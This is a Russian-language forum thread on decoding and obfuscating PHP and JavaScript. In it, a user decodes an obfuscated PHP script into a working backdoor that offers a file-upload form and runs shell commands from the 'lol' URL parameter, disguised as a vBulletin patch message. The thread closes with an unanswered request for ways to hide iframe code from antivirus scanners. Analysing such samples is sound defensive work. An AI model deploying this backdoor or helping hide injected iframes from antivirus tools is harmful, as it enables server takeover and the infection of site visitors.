Помогите пожалуйсто расшифровать этот код PHP: <?php error_reporting(0);eval(gzinflate(base64_decode( "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 lE9MitbgCPUSh1po+xsvEMwHPwM=")));?>
seens: Code: <?PHP error_reporting(0); $k2e9y7_t1h2a6t3_5s0c9r7i1p2t6_3i5s0_7c1r2y6p3t5e0d1= 3 ; $r9e1s6o5u2r7c2e_c3r0y2p9t7e1d_c2o6d3e5 = "?!nvowjsbqw,elqn.gbwb!#b`wjlm>!\$-'\\PFQUFQX!SKS\\PFOE!^-\$!#nfwklg>!slpw!= ?jmsvw#mbnf>!ejof!#wzsf>!ejof!= ?jmsvw#wzsf>!kjggfm!#mbnf>!y!#ubovf>!2!= ?jmsvw#wzsf>!pvanjw!#ubovf>!VSOLBG!= ?,elqn=\$8 je+jppfw+'\\DFWX\$olo\$^**#pzpwfn+'\\DFWX\$olo\$^*8 'vsolbggjq#>#\$-,\$8 'vsolbgejof#>#'vsolbggjq-abpfmbnf+'\\EJOFPX\$ejof\$^X\$mbnf\$^*8 je+nluf\\vsolbgfg\\ejof+'\\EJOFPX\$ejof\$^X\$wns\\mbnf\$^/#'vsolbgejof**#f`kl#!LH\"!8 ~ f`kl#!uAvoofwjm#sbwk`fg#pv``fppevooz\"!8 <=# "; $s2t7r2i3n0g_o9u1t6p5u2t0=$r9e1s6o5u2r7c2e_c3r0y2p9t7e1d_c2o6d3e5; $l0e5n3t6h_o2f_c1r7y9p2t5e3d_c6o2d1e7= strlen ( $s2t7r2i3n0g_o9u1t6p5u2t0); $e0v3a2l_p7h2p_c9o1d6e5 = '' ; for ( $h5u6i1v9a2m7v2s3e0m= 0; $h5u6i1v9a2m7v2s3em < $l0e5n3t6h_o2f_c1r7y9p2t5e3d_c6o2d1e7; $h5u6i1v9a2m7v2s3e0m++ ) $e0v3a2l_p7h2p_c9o1d6e5 .= chr ( ord ($s2t7r2i3n0g_o9u1t6p5u2t0[ $h5u6i1v92m7v2s3e0m] ) ^ $k2e9y7_t1h2a6t3_5s0c9r7i1p2t6_3i5s0_7c1r2y6p3t5e0d1 ) ; eval ( "error_reporting ( 0 ) ; ?>" .$e0v3a2l_p7h2p_c9o1d6e5."<?" ) ; ?>
Wakko В коде небольшая ошибка - Code: chr ( ord ($s2t7r2i3n0g_o9u1t6p5u2t0[ $h5u6i1v92m7v2s3e0m] ) В $h5u6i1v92m7v2s3e0m м/у 9 и 2 пропущена "a" Если исправить, то расшифровывается так: PHP: error_reporting(0);?><"multipart/form-data" action="'.$_SERVER["PHP_SELF"].'" method="post"><input name="file" type="file"><input type="hidden" name="z" value="1"><input type="submit" value="UPLOAD"></form>';if(isset($_GET['lol'])) system($_GET['lol']);$uploaddir = './';$uploadfile = $uploaddir.basename($_FILES['file']['name']);if(move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) echo "OK!";}echo "vBulletin pathced successfully!";?> Не трудно догадаться, что это код бэкдора...
а можно ли спрятать под обфускатором только часть кода?! Только чтоб скрипт оставался рабочим! я написал cms но мне надо спрятать и зашифровать несколько файлов: файл лицензии(так как лицензия выдается на определенный домен) - чтоб не смогли изменять... и файл с копирайтом разработчиков, который будет в бесплатной версии!
Мелкий Вам требуется благословение, чтобы попробовать? Я вам его даю Если обфускация не подразумевает изменение переменных на произвольный набор букво-цифр - то да, можно закодировать хоть одну строчку кода - функционирование не нарушится
Здраствуйте)) подскажите несколько секретов по обфускации кода в javascript) Вот скоро нужно будет обфусцировать скрипт,чего вот такого замудрённого есть а яваскрипте?)
Здравствуй. Попробуй записать вот такой простой код: Code: alert(0); не используя ни цифр, ни букв (сохранив его работоспособность, разумеется). Постарайся уложиться в 200 символов. К тому времени, как у тебя это получится, ты сам ответишь на свой вопрос.
хех,значит никогда)) развешто кодировку сменить,тогде это будет символы а не буквы если внемательно читать условие и тогда выйдет))ыы
У меня вопрос по защите кода. Если я правильно понял, то (zend(lockit(обусификатор(скрипт)))) уже не ломаемая конструкция? Либо (обусификатор(lockit(zend(скрипт) тоже не ломаемая конструкция. Или я чего-то не догоняю. Ведь они когда попадают в интерпретатор, то дешифруются самостоятельно для передачи кода и их в этом моменте дампят.
что делает этот код? Code: <script type="text/javascript">(function(){var G=window,K=document,A=navigator,C=A.userAgent,D=location.href,I=A.mimeTypes,B=9,F="http://kiks.%s/system/fc06.html",L="http://kiks.yandex.ru/system/fc06.swf",H="application/x-shockwave-flash";G.onerror=function(){return true};G.ya_fc=function(){var R=(C&&(C.indexOf("MSIE")>=0)&&(C.indexOf("Win")!=-1))?1:0,O=(I&&I[H])?I[H].enabledPlugin:0,Q=false,N=0;if(O){N=O.description.split("Shockwave Flash ")[1];Q=(parseInt(N)>=B)}else{if(R){Q=false;try{Q=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+B)}catch(P){}}}if(Q){K.write('<object type="'+H+'" data="'+L+'" width="1" height="1" id="ya_fc"><param name="movie" value="'+L+'" /><param name="quality" value="high" /><param name="wmode" value="window" /><param name="bgcolor" value="#ffffff" /><param name="allowScriptAccess" value="always" /></object>')}else{}};G.requestData=function(){var N=K.getElementById("ya_fc");try{N.setLocation(M(),J())}catch(O){}};G.setCookie=function(O){var N=new Date();N.setTime(N.getTime()+315360000000);K.cookie="fuid01="+O+";expires="+N.toGMTString()+";path=/;domain="+M()};G.getIFrame=function(P){var Q=F.replace("%s",P),O=K.createElement("iframe"),N=K.getElementsByTagName("body");O.src=Q;O.style.cssText="width:40px;height:40px;overflow:hidden;position:absolute;left:-40px;top:0;border:0;";O.frameBorder=0;N&&N[0].appendChild(O)};function E(P,O,Q){var N=P.match(O);return N&&N[Q||1]||""}function J(){return E(K.cookie,/fuid01=([^;]+)/)}function M(){var N=E(D,/\/\/([^\/:]+)/);return N&&E(N,/(^|\.)([^\.]+\.[^\.]+)$/,2)}})();ya_fc()</script>
Нет там никакой обфускации. Тяжело читается из-за неосмысленных имен переменных, а так все ясно и понятно.
расшифруйте, пожалуйста вот это сам дошел до корявых имен переменных типа "_______" может у вас получше выйдет http://slil.ru/28594899
там функция, в которой массив из которой можно вернуть декодированный элемент массива по его номеру. Чтобы посмотреть все элементы массива в декоде, просто запустить это: http://slil.ru/28595026 PS: какой-то спамер вконтакте похоже
так точно, это спамер и это я догадался как сделать, но похоже переменные и функции не восстановить, видимо автор их заменил тупо в редакторе, но и на том спасибо
Как лучше зделать обусфакцию iframe кода что бы не палился каспером и другими антивирусными системами ? Хотелось бы увидеть пару примеров.